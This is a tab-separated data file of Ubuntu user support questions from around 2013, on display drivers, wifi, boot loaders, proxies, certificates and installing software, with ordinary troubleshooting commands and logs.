268625	windows only refresh if click on title bar ( 12.04-virtualbox )	i am trying to install ubuntu 12.04 lts in a virtualbox running on windows 7 pro . i have followed the instruction posted in why does an ubuntu 12.10 guest in virtualbox run very , very slowly ? unity 3d seems to be loading ok but all windows only update their content when i click on the window title bar . even terminal , in terminal i can press return a few times and nothing updates until i click on the title bar , then i can see the expect responses . my system - virtualbox ( 4.2.10 r84104 ) extension pack 4.2.10 ubuntu 12.04 lts additions installed i have install virtualbox oracle vm virtualbox extension pack . create a virtualbox instance and install ubuntu 12.04 lts on it . apt-get update apt-get upgrade apt-get install dkms rebooted cd /media/vboxadditions_4.2.10_84104 sudo ./vboxlinuxadditions.run rebooted add the vboxvideo driver to the instance by running : sudo bash -c 'echo vboxvideo > > /etc/modules' shutdown in my bios enabled `` intel virtualization technology '' in virtualbox set video memory 128mb and enable 3d acceleration boot ubuntu guest , and check that 3d acceleration is working by running : /usr/lib/nux/unity_support_test -p which returned opengl vendor string : humper opengl renderer string : chromium opengl version string : 2.1 chromium 1.9 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes i have also installed and run compizconfig settings manager but i ca n't find any framebuffer options . i think i just need to set some option somewhere but i have no idea where to look now . p.s . unity 2d works ok , but i would like to get unity 3d working then i could try 12.10 .
268626	why laptop boots usb but incorrect resolution after installing to hard drive ?	my situation : dell inspiron 1100 laptop 1gb , 20gb hd . ( 1024 x 748 ) . boots ubuntu 12.04 from usb to desktop fine . after installing to hd though it seems like it 's in 640 x 480 - double screen , black on right side , flickering after booting from hd . i am new to linux and am looking for direction to resolve this . i am cross-eyed from reading and feel that i 'm getting close but ... .i 've smacked the thing that did n't help ! i found somewhat dated thread that suggested interupting the grub by holding left shift and editing the line that ends in `` quiet splash '' but no success with the suggested options . any takers ? meanwhile i 'll keep trudging across the tundra , mile after mile ... good day and thanks in advance .
268628	ubuntu in windows 8	do i need to install a specific version of ubuntu to run it alongside my windows 8 ? i 've downloaded the typical version .
268633	a noisy sound is came out from hdd ( nokia booklet 3g )	i just installed ubuntu lts 10.04 on my nokia booklet 3g . it 's working smoothly . but i found a problem . i heard a noisy sound from hdd when i turned off the booklet . what should i do to resolve this issue ? thanks before
268634	how are log files persisted with the logstash charm ?	i 'd like to use the logstash juju charm and was wondering how the log files are persisted . in other words , if i lose a logstash instance will i still have access to past logs ?
268636	why does ubuntu 12.10 wifi keep disconnecting ?	i am using ubuntu 12.10 on a macbook pro with broadcom bcm4331 wireless network card . i have installed the b43 driver in order to be able to use the wireless card . however , the wireless connection gets disconnected every few minutes ( just randomly , sometimes after half an hour , sometimes after 10 or 15 minutes ... ) . i can see this in the network manager icon . and it reconnects automatically . this happens more when i am connected to wpa 2 and wpa2 enterprise , but also sometimes when i am connected to unsecured wireless networks too . please find the output of a number of command below . if you need more information please let me know . i appreciate any help in advance . sudo ifconfig -a lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 g체ltigkeitsbereich : maschine up loopback running mtu:16436 metrik:1 rx packets:712 errors:0 dropped:0 overruns:0 frame:0 tx packets:712 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenl채nge:0 rx-bytes:56910 ( 56.9 kb ) tx-bytes:56910 ( 56.9 kb ) wlan0 link encap : ethernet hardware adresse 14:10:9f : db : d6:7b inet adresse:192.168.2.103 bcast:192.168.2.255 maske:255.255.255.0 inet6-adresse : fe80 : :1610:9fff : fedb : d67b/64 g체ltigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx packets:411 errors:0 dropped:0 overruns:0 frame:0 tx packets:468 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenl채nge:1000 rx-bytes:119863 ( 119.8 kb ) tx-bytes:81782 ( 81.7 kb ) lspci | grep broadcom 03:00.0 ethernet controller : broadcom corporation device 16a3 ( rev 10 ) 03:00.1 sd host controller : broadcom corporation netxtreme bcm57765 memory card reader ( rev 10 ) 04:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) modprobe -l | grep b43 updates/cw-3.6/b43legacy.ko updates/cw-3.6/b43.ko modprobe -l | grep bcm kernel/drivers/usb/host/bcma-hcd.ko kernel/drivers/input/mouse/bcm5974.ko kernel/drivers/media/dvb/frontends/bcm3510.ko kernel/drivers/staging/bcm/bcm_wimax.ko kernel/net/can/can-bcm.ko updates/cw-3.6/bcma.ko updates/cw-3.6/bcm203x.ko cat /etc/network/interfaces auto lo iface lo inet loopback by the way , i do n't know of this is odd or not , but , in the system log ( /var/log/syslog ) every few minutes i see authentication by wpa_supplicant like this : networkmanager [ 970 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected networkmanager [ 970 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning wpa_supplicant [ 1368 ] : wlan0 : sme : trying to authenticate with 20:2b : c1:50:0e:76 ( ssid='foo ' freq=2442 mhz ) [ 365.771706 ] wlan0 : authenticate with 20:2b : c1:50:0e:76 networkmanager [ 970 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating
268637	how can i add an ssl client certificate/key globally in ubuntu ?	i have a web server which requires a client certificate to establish an ssl connection ( sslverifyclient require in apache ) . in firefox or chrome , i simply import the .p12-file containing my certificate in pkcs 12 format in the tab `` your certificates '' , and this works like it should . now i want to use other applications , which afaik do n't have the functionality to provide a client ssl certificate themselves ( e.g . nautilus ) . i guess that there has to be a system-wide location where i can store my client certificate , but the only thing i find when googling is where to store ca certificates . so my question is how can i add ssl client certificate / key files ( either .p12 or .crt and .key i guess ) so that they are used systemwide ?
268639	is ubuntu installation binded to the installed-on hardware ?	if ubuntu was installed ( full installation ) on a usb flash memory , and then tried to boot that flash memory on another pc , will it boot ? i am trying to decide whether to use full installation or use a live cd image with a persistent file .
268643	network issue in lenovo b570e on ubuntu	`i am switched from windows to dual boot with ubuntu 6 months ago . and its network card was working fine . one of my colleague having same model who had just installed ubuntu told me that there is some issue with its wireless driver , as i remember it was some dis-connectivity happening but that was n't a major issue . he told me 2 commands , which i do n't remember , i executed around a month ago . and from then i am facing connectivity problem . at home , i have to use cable instead of wifi and at office i have to use tp-link usb stick by one of my colleague . otherwise for a week , do n't know due to some ubuntu release or some other reason , i am unable to connect and use my internet through wifi . i can have a tp-link usb that just work fine , but my questions is : that how can i check that why all that happened ? if it was working before , then their should be its solution with any external hardware by installing some driver or configurations , so what is that solution ? is there some command i need to execute to get further information and post here ? thanks in advance guys
268644	which bash shortcuts/tips are available ?	depending on his type of usage , an ubuntu user may spend a lot of time in front of a terminal . knowing some keyboard shortcuts can make you save a lot of time ( ex : copy/paste text , move between the prompt text , etc ) . so which bash tips/shortcuts do you guys know ?
268646	when to apply the kernel update ?	lets say a update is available for the kernel version x . does it mean following higher versions of the kernel will include that update ? thanks
268648	why does providesupport chat console not produce event sounds ?	i am using providesupport chat console from providesupport.com on ubuntu 12.10 . first of all , it crashes sometime : ( but thats okay . the real problem is : it is not producing event sounds . it says supported playback system is not available .
268652	firefox can not find website servers , what is wrong ?	recently , i tried to access the internet using firefox . i have a good wifi signal according to the toolbar at the top , but firefox says `` firefox ca n't find the server atwww.example.com . '' i tried disabling ufw , but that did nothing . what exactly is happening that is preventing firefox from accessing the internet , and how can i fix this issue ? i 'm using ubuntu 12.10 , and the machine is a compaq presario cq62 . note : just before the issue , firefox installed an update . also , i did not use the computer for a month or so before this issue , and the last time i used it there was no such issue .
268653	change unity 's indicator messages envelope color from blue	how can i change the `` you 've got mail '' messaging indicator envelope color ? is there a setting similar to as in allowing any indicators ?
268654	how do i prevent the file manager from opening when i click to open a file from outside the file manager	i 'm using ubuntu 11.10 with awn and synapse installed and unity disabled . whenever i search for a file on synapse and try to open it from there or from any other location , like a quick launcher from awn , the system opens up the default file manager and navigates to the actual location , before it opens the file . if the default file manager is set to nautilus , the file will actually not open . however i use dolphin as my default and while it does open the file and it does not hamper functionality , it is a very annoying action as it leaves unwanted file manager windows open . how can i stop the system doing this without using unity or opening the file directory from the file manager as some files are several directories deep ?
268655	how can i run a script before deja-dup back up starts ?	i have set up a perforce server and now want to run deja-dup back up to back the server up . the problem is that before the back up starts , i have to run a script to make a check point on perforce database and journaling . the question is : can i change deja-dup setting to run that script before the back up starts or there is another better automated way to do that ? please let me know if further info is required . i have ubuntu 12.10
268657	what to do about those shutdown errors ?	when i press shutdown it goes to this screen : mountall : disconnected from plymouth acpid : exiting [ 1078.933492 ] info : task xorg :1128 blocked for more than 120 seconds . [ 1078.933628 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 1078.933492 ] info : task xorg :1128 blocked for more than 120 seconds . [ 1078.933628 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 1078.933492 ] info : task xorg :1128 blocked for more than 120 seconds . [ 1078.933628 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . and has n't turned off 10 minutes later . running 12.10 with cinnamon de , amd hd3000 graphics , /home partition on different drive and conky setup . any ideas ?
268658	problem with applying socks proxy systemwide	i trying tunnel my traffic through ssh server . when i use firefox network setting , it work well but when i try apply the socks proxy system wide from ubuntu setting and tunnel google-chrome traffic , it just do n't work . i guess problem is ubuntu proxy tool apply socks proxy even for terminal which cause ssh connection fail because proxy is something like 127.0.0.1:1194 how to fix it on ubuntu 12.4 ?
268661	unable to remove openjdk from ubuntu 12.04.01	i ran the following in terminal sudo apt-get remove openjdk-6-jre but java -version still show as openjdk installed . please see image below how to remove openjdk from ubuntu 12.04.01 ?
268662	ca n't rake , missing gem but it 's available	i 'm trying to rake but i keep getting this as you can see , i18n ( 0.6.4 ) is installed and alive , so what 's going on ? what am i missing ? i have tried to uninstall and install again , all went well but got the same error after : / sudo gem uninstall i18n sudo bundle install even tried install it using sudo gem install i18n , it installed , but got the same error ... btw , the application is redmine , the one i 'm trying to rake myself into ... using ubuntu server 12.10 x64 on amazon ec2 ( micro instance )
268671	basic server build for practicing and learning linux on	i am taking it upon myself to learn linux , so here is what i want to accomplish ; i want to set up a server primarily for practice . i do n't need it to do anything specific accept allow me to login via ssh . i have attempted this before and had the following issues : - my dns kept changing and the only way to log into the server was to use the site `` whatsmyip '' to log directly into my home network . i was able to login when i am sitting at home , but if i was to go to `` starbucks or any place like that i was n't able to login .
268672	saving downloaded pdf-files	downloaded pdf-documents are saved as pdf.html instead of simply pdf and that means that i can read the document only online . i noticed that the data menu of ubuntu 12.04 only offers the alternative to save the page instead of the alternative save a copy - that is what i was used to . is that the problem of the version or settings of firefox ? ? ?
268673	using ubuntu , how do i connect to a windows share on my windows server 2008	i 'm switching from windows 7 to ubuntu 12.10 , , , in windows , to access my server , all i have to do is open credential manager and add my servername , username , and password , , , and it works , i have access to all my shared folders . i then would map network drives so i could access them with ease . in ubuntu , how do i go about doing this . i would like for these shares to be available in the left pane when i open the home folder . i also need them to be available no matter how many times i reboot .
268678	no hdmi audio output from amd laptop	my laptop is a dell inspiron m5110 , that runs ubuntu 12.10 . when i plug in hdmi to my 39 inch 1080p television and play a audio file , sound comes out through the laptop speakers . the hdmi video seems to work normally . my graphics card is a amd radeon hd 6620g , integrated on my amd a8-m3500 apu cpu . i am using the open-source graphics drivers . i ran the aplay -l command and the results are this : dell1 @ dell-inspiron-m5110-laptop-ubuntu : ~ $ aplay -l **** list of playback hardware devices **** card 0 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic_1 [ hd-audio generic ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 dell1 @ dell-inspiron-m5110-laptop-ubuntu : ~ $ from what was listed above , ubuntu does not detect a hdmi audio output , nor is it listed in the sound settings . i also altered the /etc/default/grub file from this : grub_cmdline_linux_default= '' quiet splash '' to this : grub_cmdline_linux_default= '' quiet splash radeon.audio=1 '' once i did that , a hdmi/displayport 1 audio device showed up in sound settings , but it did n't work . so i reverted my changes in that file to its default , since it did n't work . any help is appreciated .
268680	kubuntu 12.10 amd 64 live cd unbootable	i recently bought an asus s56c ultrabook , it cames with windows 8 pre-installed . it 's my first time with uefi technology so i 'm not 100 % sure of what i 'm doing . : ) i disabled secure boot and i 'm pretty sure i disabled fast boot too , i will attach a screen shot about this . anyhow i successfully installed lubuntu 12.10 from alternative cd and ubuntu 12.10 from regular dvd . now i can not install kubuntu : i downloaded kubuntu 12.10 amd64 iso and burn it to a dvd . i pressed f2 and selected uefi to boot my dvd . then i saw a screen selection like grub and i selected try kubuntu . the process started , i saw the logo of kubuntu and after a while everything stopped with a black screen . i tried replacing quite splash with nomodeset in the options , but the starting process always stops at a different point . what can i try now ?
268696	how to create my own webapp unity integration ?	i 'm trying to create some webapps to use with firefox . i got an tutorial from canonical ( http : //developer.ubuntu.com/resources/app-developer-cookbook/unity/integrating-tumblr-to-your-desktop/ ) and i did n't understand one thing , maybe someone could help me . i have to run the following script in web console : // ==userscript== // @ name tumblr-unity-integration // @ include https : //tumblr.com/dashboard // @ version @ version @ // @ author webapps team // @ require utils.js // ==/userscript== window.unity = external.getunityobject ( 1.0 ) ; unity.init ( { name : `` tumblr '' , iconurl : `` icon : //tumblr '' , oninit : null } ) ; everything is fine , it created the icon launcher and work with alt+tab . that enough for me by now , but , if i close the windows , the launcher icon that i created before stop working ( i mean , it open the site , but does n't work like other webapp and does n't show in alt+tab too ) . maybe i have to run this script automatically every time i enter on that site ( in this example , tumblr ) . how can i do that ? thanks ,
268700	how to correctly reinstall network-manager	i tried to install connman and it did n't work , so i removed it . then i tried to sudo apt-get install network-manager network-manager-gnome` and that obviously did n't work so i found the correct .deb packages and installed them . ethernet now works , but wireless does n't . did i do something wrong ? whenever i press my hardware wireless switch it does n't react . the applet tells me that wireless is disabled by a hardware switch , but my only hardware switch does n't do anything .
268703	install .tar.gz and .tar files ?	cody again . i 'm still sort of a noob at installing things so i need your help ... im trying to install hping3 and of course it 's a .tar.gz file ... i 've looked everywhere even on here and no solutions ... please help ! !
268705	how to install django ?	help to install django . when i extract the file the contents have been just dumped all over my home folder and when i try to either import django or sudo install it i get errors .
268707	need help with gtk # and mono	in my quest for platform-independence , i built a simple hello-world app on my windows machine using monodevelop 4.0 and gtk # 2.12 . when i try to run it on my ubuntu 12.04 lts , i get the below runtime error : unhandled exception : system.typeloadexception : could not load type 'mainwindow ' from assembly 'hellogtk , version=1.0.4824.3971 , culture=neutral , publickeytoken=null ' . [ error ] fatal unhandled exception : system.typeloadexception : could not load type 'mainwindow' from assembly 'hellogtk , version=1.0.4824.3971 , culture=neutral , publickeytoken=null ' . my mono runtime version is 2.10 . can you suggest what could have gone wrong ?
268709	dual-booting lubuntu with windows 8	i 've got an older laptop ( hp g62 ) that has windows 8 as it 's primary os and i want to dual-boot it with lubuntu . it does not come with secure boot nor does it come with uefi . i 've been looking at this guide ( http : //www.liberiangeek.net/2012/10/dual-booting-windows-7-and-ubuntu-12-10-quantal-quetzal/ ) and it says that i need to : shrink the windows partition create a primary ext4 partition ( using the free space ) with the mount point set to / create a swap ( logical ) partition note : for me , it would be 6gbs . choose the lubuntu partition and click `` install now '' i am 100 % aware that the link that i provided does talk about windows 7 , but i have not seen any valid guide on how to dual-boot lubuntu with windows 8 on a laptop or pc without uefi . i have two questions : will grub replace my windows 8 boot loader ? should i make the main partition ( / ) primary ? i know this guide is for ubuntu , but since they 're pretty much the same i though this guide would work for lubuntu users as well .
268719	what are all possible ways to login into an ubuntu system ?	i am running ubuntu 12.10 on my laptop and i would like to make a set up such that without a login password , no one would be able to login into my system . currently it seems that one can , quite easily , login into ubuntu operating system using the recovery mode , or using an ubuntu live usb . when i realized that the system can be logged in so easily without a password , i wonder what 's the purpose of the login password anyways ! anyhow , how can i temporarily disable recovery mode and live usb boot ? if there are other ways to get into usb , i would like to know that as well . this is to prevent my roommate from getting access to my laptop when i go for vacation . so if some logging method requires a change of password before displaying my home directory , that 's a less significant security risk for me , 'cause then i wont be able to login myself and will `` detect '' that someone has used my system ( so your friend wont do that 'cause he knows you will find out and more importantly can not login anymore ) . also i would like to password protect usb ports temporarily so that data can not be copied out ( or a keyloger can not be copied in ) without entering my root password . thanks
268721	how to make ls produce iso 8601 format	in older versions of ubuntu , like 9.10 , ls ( 1 ) produced iso 8601 format by default , in the way ls -l -- time-style=long-iso does it . with 12.04 , we 're back at the older unix style . thus replacing the year by minutes and seconds for recent dates . how can i - in the least intrusive manner change this back to long-iso ? is there maybe some general configuration option ?
268727	hierarchy in launcher ?	help ! my launcher is full ! and scrolling through the icons is so painfully slow ! is there any possibility to apply a hierarchy in the launcher ? some folder-like icon where you can put in a bunch of launcher icons ? and when you click on it , they will be shown . so you can start an app in the launcher with two clicks instead of one and you do n't have to scroll all the way down every time .
268730	how export all software upgrade links ( .deb ) in text file by terminal	update ubuntu by usual way and slow internet is problem for me . is there a way into terminal , get all link files that is going to be updated ( eg , the address for firefox http : //us.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_19.0.2+build1-0ubuntu0.12.10.1_i386.deb ) into a text file ? i want to get these files with download manager ( eg downthemall ) and then manually enter the path /var/cache/apt/archives placed and upgrade it ? sorry for unclear whether written , this text was translated by google translate .
268733	is there a system restore in ubuntu server ?	i 'm thinking about installing the desktop on my ubuntu server ( sudo apt-get install ubuntu-desktop ) . is there a `` system restore '' i can run in case i do n't want the desktop anymore ?
268739	old pc used under ubuntu low graphic mode	i want to disable the gui for an old pc used for a server in my company to serve an erp web application . the pc is fairly low spec'ed : p4 3.2 ghz and 384mb of ram
268740	boot ubuntu from msata ssd	i have an hp envy ultrabook 4-1030us , which i have a 250gb 2.5 '' ssd and a 32 gb msata ssd which was originally used for the intel rst which obviously is n't necessary because i installed an ssd . but now i want to use that 32gb msata ssd to run ubuntu , using the larger drive solely for windows . i have tried running the installer and installing grub on the first drive , which did n't work . it just boots windows 8 . i tried putting the /boot partition on the first drive , it still boots windows . no grub . i ca n't configure to bios to boot off the smaller drive , it does n't have that capability . any ideas on how i can get this to work ? thanks in advance !
268742	join.me alternatives ?	there is a free screen-sharing program , join.me , that only the broadcaster has to download . its site is here . is there an equivalent for ubuntu ?
268743	cairo dock is uninstalled but the entry is still there in the ubuntu login screen	i have tried reinstalling it and then purging the package , but the entry is still there . i have used sudo apt-get clean as well and i have tried using deborphan . none of these will remove the entry . is there any other way to remove it
268744	grub hidden menu not working	the hidden menu option is n't working . i want the menu to remain hidden during boot but show up when i press a button . i have /etc/default/grub configured as follows : grub_default=0 grub_hidden_timeout=10 grub_hidden_timeout_quiet=true grub_timeout=5 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' with the settings : grub_default=0 grub_hidden_timeout=10 grub_hidden_timeout_quiet=true grub_timeout=0 the menu does n't appear if i press nothing , and i can tell the computer is waiting 10 seconds to boot . the problem is no matter what i press ( esc , tab , shift , enter ) and no matter when i press it or if/when i hold it , i ca n't get the menu to come up . the only thing that appears is the text : grub loading ... any suggestions would be greatly appreciated !
268747	apparent low color depth on efi boot	i am running ubuntu 13.04 and mint 14 on a mac mini 6,2 ( late 2012 ) - intel hd4000 . when i boot from the legacy bios , i see good colour as it should appear . however , when i boot from the efi partition , i see low color depth . this is not an x server colour setting as i can see difference between 16 bit and 24 bit but neither is a perfectly reproduced colour . how may i fix the display when i boot using efi ? by /boot folder is as below and /boot/efi is a separate partition . . ├── abi-3.5.0-17-generic ├── abi-3.5.0-25-generic ├── config-3.5.0-17-generic ├── config-3.5.0-25-generic ├── efi │ └── efi │ ├── boot │ │ ├── bootx64.efi │ │ └── bootx64.efi.grb │ ├── linuxmint │ │ └── grubx64.efi │ └── microsoft │ └── boot │ ├── bootmgfw.efi │ ├── bootmgfw.efi.grb │ ├── bootx64.efi │ └── bootx64.efi.grb ├── grub │ ├── fonts │ │ └── unicode.pf2 │ ├── grub.cfg │ ├── grub.efi │ ├── grubenv │ ├── locale │ │ ├── en_au.mo │ │ ├── en_ca.mo │ │ └── en_gb.mo │ └── x86_64-efi │ ├── acpi.mod │ ├── adler32.mod │ ├── affs.mod │ ├── afs.mod │ ├── ahci.mod │ ├── all_video.mod │ ├── aout.mod │ ├── appleldr.mod │ ├── ata.mod │ ├── at_keyboard.mod │ ├── backtrace.mod │ ├── bfs.mod │ ├── bitmap.mod │ ├── bitmap_scale.mod │ ├── blocklist.mod │ ├── boot.mod │ ├── bsd.mod │ ├── btrfs.mod │ ├── bufio.mod │ ├── cat.mod │ ├── chain.mod │ ├── cmp.mod │ ├── command.lst │ ├── configfile.mod │ ├── core.efi │ ├── cpio_be.mod │ ├── cpio.mod │ ├── cpuid.mod │ ├── crc64.mod │ ├── cryptodisk.mod │ ├── crypto.lst │ ├── crypto.mod │ ├── cs5536.mod │ ├── datehook.mod │ ├── date.mod │ ├── datetime.mod │ ├── diskfilter.mod │ ├── dm_nv.mod │ ├── echo.mod │ ├── efifwsetup.mod │ ├── efi_gop.mod │ ├── efinet.mod │ ├── efi_uga.mod │ ├── ehci.mod │ ├── elf.mod │ ├── exfat.mod │ ├── exfctest.mod │ ├── ext2.mod │ ├── extcmd.mod │ ├── fat.mod │ ├── fixvideo.mod │ ├── font.mod │ ├── fshelp.mod │ ├── fs.lst │ ├── functional_test.mod │ ├── gcry_arcfour.mod │ ├── gcry_blowfish.mod │ ├── gcry_camellia.mod │ ├── gcry_cast5.mod │ ├── gcry_crc.mod │ ├── gcry_des.mod │ ├── gcry_md4.mod │ ├── gcry_md5.mod │ ├── gcry_rfc2268.mod │ ├── gcry_rijndael.mod │ ├── gcry_rmd160.mod │ ├── gcry_seed.mod │ ├── gcry_serpent.mod │ ├── gcry_sha1.mod │ ├── gcry_sha256.mod │ ├── gcry_sha512.mod │ ├── gcry_tiger.mod │ ├── gcry_twofish.mod │ ├── gcry_whirlpool.mod │ ├── geli.mod │ ├── gettext.mod │ ├── gfxmenu.mod │ ├── gfxterm.mod │ ├── gptsync.mod │ ├── grub.efi │ ├── gzio.mod │ ├── halt.mod │ ├── hashsum.mod │ ├── hdparm.mod │ ├── hello.mod │ ├── help.mod │ ├── hexdump.mod │ ├── hfs.mod │ ├── hfsplus.mod │ ├── http.mod │ ├── iorw.mod │ ├── iso9660.mod │ ├── jfs.mod │ ├── jpeg.mod │ ├── keylayouts.mod │ ├── keystatus.mod │ ├── ldm.mod │ ├── linuxefi.mod │ ├── linux.mod │ ├── loadbios.mod │ ├── loadenv.mod │ ├── loopback.mod │ ├── lsacpi.mod │ ├── lsefimmap.mod │ ├── lsefisystab.mod │ ├── lsmmap.mod │ ├── ls.mod │ ├── lspci.mod │ ├── lssal.mod │ ├── luks.mod │ ├── lvm.mod │ ├── lzopio.mod │ ├── mdraid09_be.mod │ ├── mdraid09.mod │ ├── mdraid1x.mod │ ├── memdisk.mod │ ├── memrw.mod │ ├── minicmd.mod │ ├── minix2_be.mod │ ├── minix2.mod │ ├── minix3_be.mod │ ├── minix3.mod │ ├── minix_be.mod │ ├── minix.mod │ ├── mmap.mod │ ├── moddep.lst │ ├── msdospart.mod │ ├── multiboot2.mod │ ├── multiboot.mod │ ├── net.mod │ ├── newc.mod │ ├── nilfs2.mod │ ├── normal.mod │ ├── ntfscomp.mod │ ├── ntfs.mod │ ├── odc.mod │ ├── ohci.mod │ ├── part_acorn.mod │ ├── part_amiga.mod │ ├── part_apple.mod │ ├── part_bsd.mod │ ├── part_dvh.mod │ ├── part_gpt.mod │ ├── partmap.lst │ ├── part_msdos.mod │ ├── part_plan.mod │ ├── part_sun.mod │ ├── part_sunpc.mod │ ├── parttool.lst │ ├── parttool.mod │ ├── password.mod │ ├── password_pbkdf2.mod │ ├── pata.mod │ ├── pbkdf2.mod │ ├── play.mod │ ├── png.mod │ ├── priority_queue.mod │ ├── probe.mod │ ├── raid5rec.mod │ ├── raid6rec.mod │ ├── read.mod │ ├── reboot.mod │ ├── regexp.mod │ ├── reiserfs.mod │ ├── relocator.mod │ ├── romfs.mod │ ├── scsi.mod │ ├── search_fs_file.mod │ ├── search_fs_uuid.mod │ ├── search_label.mod │ ├── search.mod │ ├── serial.mod │ ├── setjmp.mod │ ├── setpci.mod │ ├── sfs.mod │ ├── sleep.mod │ ├── squash4.mod │ ├── tar.mod │ ├── terminal.lst │ ├── terminal.mod │ ├── terminfo.mod │ ├── test_blockarg.mod │ ├── testload.mod │ ├── test.mod │ ├── tftp.mod │ ├── tga.mod │ ├── time.mod │ ├── trig.mod │ ├── true.mod │ ├── udf.mod │ ├── ufs1.mod │ ├── ufs2.mod │ ├── uhci.mod │ ├── usb_keyboard.mod │ ├── usb.mod │ ├── usbms.mod │ ├── usbserial_common.mod │ ├── usbserial_ftdi.mod │ ├── usbserial_pl2303.mod │ ├── usbtest.mod │ ├── video_bochs.mod │ ├── video_cirrus.mod │ ├── video_fb.mod │ ├── videoinfo.mod │ ├── video.lst │ ├── video.mod │ ├── videotest.mod │ ├── xfs.mod │ ├── xnu.mod │ ├── xnu_uuid.mod │ ├── xzio.mod │ ├── zfscrypt.mod │ ├── zfsinfo.mod │ └── zfs.mod ├── initrd.img-3.5.0-17-generic ├── initrd.img-3.5.0-25-generic ├── memtest86+.bin ├── memtest86+_multiboot.bin ├── system.map-3.5.0-17-generic ├── system.map-3.5.0-25-generic ├── vmlinuz-3.5.0-17-generic └── vmlinuz-3.5.0-25-generic output of cat /var/log/xorg.0.log | grep -i depth : `` default screen section '' for depth/fbbpp 24/32 [ 20.983 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 21.919 ] ( == ) depth 24 pixmap format is 32 bpp
268749	amd driver install troubleshooting	i have an ati 5670 hd . i 'm running ubuntu 12.10 64bit . i 've been having a hell of a time trying to install the most recent drivers for my video card . everything else seems to be working with the exception of the video card . it 's a fresh install on a new partition . i followed the instructions to the letter here : http : //wiki.cchtml.com/index.php/ubuntu_quantal_installation_guide and my card is definitely supported by the drivers , i know this for certain because in another partition i have a 32 bit system where both catalyst 13.1 and 13.2 work flawlessly : sudo lshw -c video pci ( sysfs ) *-display unclaimed description : vga compatible controller product : redwood [ radeon hd 5670 ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : d0000000-dfffffff memory : fbee0000-fbefffff ioport : e000 ( size=256 ) memory : fbec0000-fbedffff then i tried using this tool ( which essentially duplicates the instructions on the guide ) : http : //www.thefanclub.co.za/how-to/ubuntu-amd-catalyst-install what i end up with is always the same , regardless of which drivers ( 13.1,13.2 ) i install on the system . $ fglrxinfo x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 155 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 13 current serial number in output stream : 13 i 've tracked what i believe to be the problem during the manual install process : ( reading database ... 198845 files and directories currently installed . ) preparing to replace fglrx 2:9.000-0ubuntu3 ( using fglrx_12.100-0ubuntu1_amd64.deb ) ... removing all dkms modules done . unpacking replacement fglrx ... preparing to replace fglrx-amdcccle 2:8.970-0ubuntu1 ( using fglrx-amdcccle_12.100-0ubuntu1_amd64.deb ) ... unpacking replacement fglrx-amdcccle ... preparing to replace fglrx-dev 2:8.970-0ubuntu1 ( using fglrx-dev_12.100-0ubuntu1_amd64.deb ) ... unpacking replacement fglrx-dev ... setting up fglrx ( 2:12.100-0ubuntu1 ) ... update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken update-initramfs : deferring update ( trigger activated ) loading new fglrx-12.100 dkms files ... building only for 3.5.0-17-generic building for architecture x86_64 module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle ( 2:12.100-0ubuntu1 ) ... setting up fglrx-dev ( 2:12.100-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-17-generic processing triggers for libc-bin ... ldconfig deferred processing now taking place the part where is says `` update alternative '' does not present itself during the duplicated installation process on my 32bit ubuntu install on the same computer : update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group x86_64-linux-gnu_gl_conf is broken
268750	how to install shan language on ubuntu 12.04	i 'm from myanmar . at our place we use shan language which is related to thai . how do i set-up my ubuntu 12.04 so that i can read and write in my language ?
268873	how do i decrease the display brightness an acer 5830tg ?	i am facing a problem with display brightness in ubantu or other versions of linux . runing a linux distro as live or hdd installation or inside installation , display brightness is automatically set to highest value , i 'm unable to decrease it , this is an annoying problem at night . i have tried about 25 different linux distros in my laptop another 3 laptops of friends but same problem , no problem with desktop as the monitor has its own brightness control switch . my laptop is acer 5830tg , i5 2410m @ 2.3 ghz , ram-3gb , hdd-640gb @ 5400 rpm , nvidia gt540m , chipset-intel hm65 . oem os- windows7 home premium . i have tried the fn+ < ( left arrow key ) as in windows , ubantu is showing that brightness is decreased but not really , display brightness is same . also tried ubantu display brightness applet . and at terminal~ $ sudo setpci -s 00:02.0 f4.b=** where ** is two digit hex value , 00:02.0 is internal display adapters ( intel hd 3000 ) hardware address ( lspci | grep vga ) . nothing happened , display brightness remained same .
